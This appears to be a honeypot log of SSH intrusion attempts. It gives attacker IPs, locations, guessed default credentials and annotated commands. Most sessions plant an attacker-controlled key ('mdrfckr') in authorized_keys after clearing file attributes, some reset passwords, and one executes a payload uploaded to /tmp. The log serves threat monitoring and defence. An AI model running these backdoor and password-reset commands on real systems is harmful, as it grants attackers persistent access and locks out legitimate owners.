$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 bike_sol (164.92.212.13) — Amsterdam, The Netherlands · 72 sessions · 72 cmds

2026-04-13 18:21 EDT · as admin/123456, admin/admin, admin/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×72

🎭 cowboy_root_7 (35.225.56.202) — Council Bluffs, United States · 1 session · 2 cmds

2026-04-14 02:25 EDT · as oracle/oracle2025!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 capoeira_root_5 (186.219.184.142) — Piraquara, Brazil · 1 session · 20 cmds

2026-04-14 02:22 EDT · as oracle/oracle2025!

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "oracle2025!\n4aQ8SS1bnqhC\n4aQ8SS1bnqhC"|passwd|bash

$ Enter new UNIX password:

$ echo "oracle2025!\n4aQ8SS1bnqhC\n4aQ8SS1bnqhC\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 jade_root_9 (116.147.40.93) — Jinrongjie, China · 1 session · 20 cmds

2026-04-14 02:13 EDT · as oracle/oracle2025!

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "oracle2025!\nP49pM5u7GXiW\nP49pM5u7GXiW"|passwd|bash

$ Enter new UNIX password:

$ echo "oracle2025!\nP49pM5u7GXiW\nP49pM5u7GXiW\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 stein_root_16 (87.106.187.209) — Berlin, Germany · 1 session · 2 cmds

2026-04-14 02:11 EDT · as oracle/Oracle4

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_2 (171.244.198.133) — Hanoi, Vietnam · 1 session · 1 cmd

2026-04-14 01:58 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 yankee_sol_3 (92.118.39.92) — Dallas, United States · 85 sessions · 85 cmds

2026-03-07 10:22 EST · as admin/admin, admin/admin123, eth/eth

Ran uname 90x across 90 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×85

↳ obfuscated system check

🎭 cowboy_sol_4 (66.42.117.122) — Elk Grove Village, United States · 4 sessions · 4 cmds

2026-04-14 00:54 EDT · as guest/guest, oracle/P@ssw0rd, ubuntu/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×4

🎭 moose_root_7 (158.69.194.34) — Montreal, Canada · 1 session · 2 cmds

2026-04-14 00:30 EDT · as oracle/Oracle13

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_58 (103.176.79.139) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-14 00:14 EDT · as oracle/Oracle01!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cowboy_root_8 (157.245.124.28) — Clifton, United States · 1 session · 1 cmd

2026-04-13 22:11 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 gouda_root_8 (141.11.197.171) — Meppel, The Netherlands · 1 session · 2 cmds

2026-04-13 20:55 EDT · as oracle/testoracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 monet_root_2 (92.205.56.196) — Strasbourg, France · 1 session · 2 cmds

2026-04-13 20:22 EDT · as oracle/testoracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 stroopwafel_root_3 (2.59.183.94) — Meppel, The Netherlands · 4 sessions · 26 cmds

2026-04-07 20:48 EDT · as oracle/Oracle30!, oracle/oracle0, oracle/testoracle

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×4

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×4

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "tomcat\nyi15naZcrmFU\nyi15naZcrmFU"|passwd|bash

$ Enter new UNIX password:

$ echo "tomcat\nyi15naZcrmFU\nyi15naZcrmFU\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_52 (8.222.219.23) — Singapore, Singapore · 1 session · 1 cmd

2026-04-13 15:08 EDT · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 eagle_root_12 (135.232.232.21) — Chicago, United States · 2 sessions · 2 cmds

2026-04-13 07:05 EDT · as root/123456, root/12345678

hostname discovery → env

$ hostname

↳ hostname discovery

$ env | head -10

🎭 cowboy_root_9 (20.161.60.22) — Boydton, United States · 1 session · 1 cmd

2026-04-13 06:51 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -m 2>/dev/null || echo unknown

🎭 ghost_root_59 (42.114.92.75) — Hanoi, Vietnam · 1 session · 2 cmds

2026-04-13 05:12 EDT · as oracle/oracle29

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_sol_2 (102.88.137.80) — Lagos, Nigeria · 1 session · 2 cmds

2026-04-13 05:07 EDT · as oracle/oracle29

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 monsoon_root_5 (183.82.111.224) — Hyderabad, India · 1 session · 2 cmds

2026-04-13 04:54 EDT · as oracle/oracle29

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_root_2 (72.253.251.3) — Lahaina, United States · 1 session · 2 cmds

2026-04-13 04:52 EDT · as oracle/oracle29

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_38 (165.154.5.249) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-13 04:52 EDT · as oracle/oracle29

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_22 (113.56.35.44) — Beijing, China · 1 session · 1 cmd

2026-04-13 02:29 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 specter_root_3 (190.119.63.81) — Lima, Peru · 24 sessions · 24 cmds

2026-04-12 23:00 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×24

🎭 specter_root_43 (122.53.133.167) — Cabuyao, Philippines · 2 sessions · 4 cmds

2026-04-13 01:05 EDT · as oracle/oracle11!, oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 k-pop_pi (220.78.78.97) — Mapo-gu, South Korea · 2 sessions · 3 cmds

2026-04-13 01:19 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x 54ktqbmR && bash -c ./54ktqbmR

↳ make executable

$ ./54ktqbmR

↳ execute payload

$ scp -t /tmp/54ktqbmR

↳ execute from /tmp

🎭 wraith_root_39 (103.172.20.218) — Rengasdengklok, Indonesia · 2 sessions · 4 cmds

2026-04-13 00:57 EDT · as oracle/oracle11!, oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 capoeira_root_2 (177.85.247.230) — Timon, Brazil · 3 sessions · 6 cmds

2026-04-12 02:47 EDT · as oracle/Oracle2026!@#, oracle/oracle11!, oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 specter_root_44 (103.146.23.145) — Tây Mỗ, Vietnam · 1 session · 2 cmds

2026-04-13 00:10 EDT · as oracle/Oracle!2025

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tulip_root_11 (172.233.51.159) — Amsterdam, The Netherlands · 1 session · 2 cmds

2026-04-12 22:14 EDT · as oracle/oracle23!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_23 (47.105.41.187) — Qingdao, China · 1 session · 1 cmd

2026-04-12 19:51 EDT · as oracle/Oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 panda_root_11 (182.92.158.201) — Beijing, China · 1 session · 1 cmd

2026-04-12 17:57 EDT · as oracle/oracle@123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 seoul_root_7 (211.254.212.59) — Seongnam-si, South Korea · 1 session · 2 cmds

2026-04-12 17:34 EDT · as oracle/oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 bike_root_8 (89.190.156.19) — Amsterdam, The Netherlands · 1 session · 1 cmd

2026-04-12 16:42 EDT · as root/123456

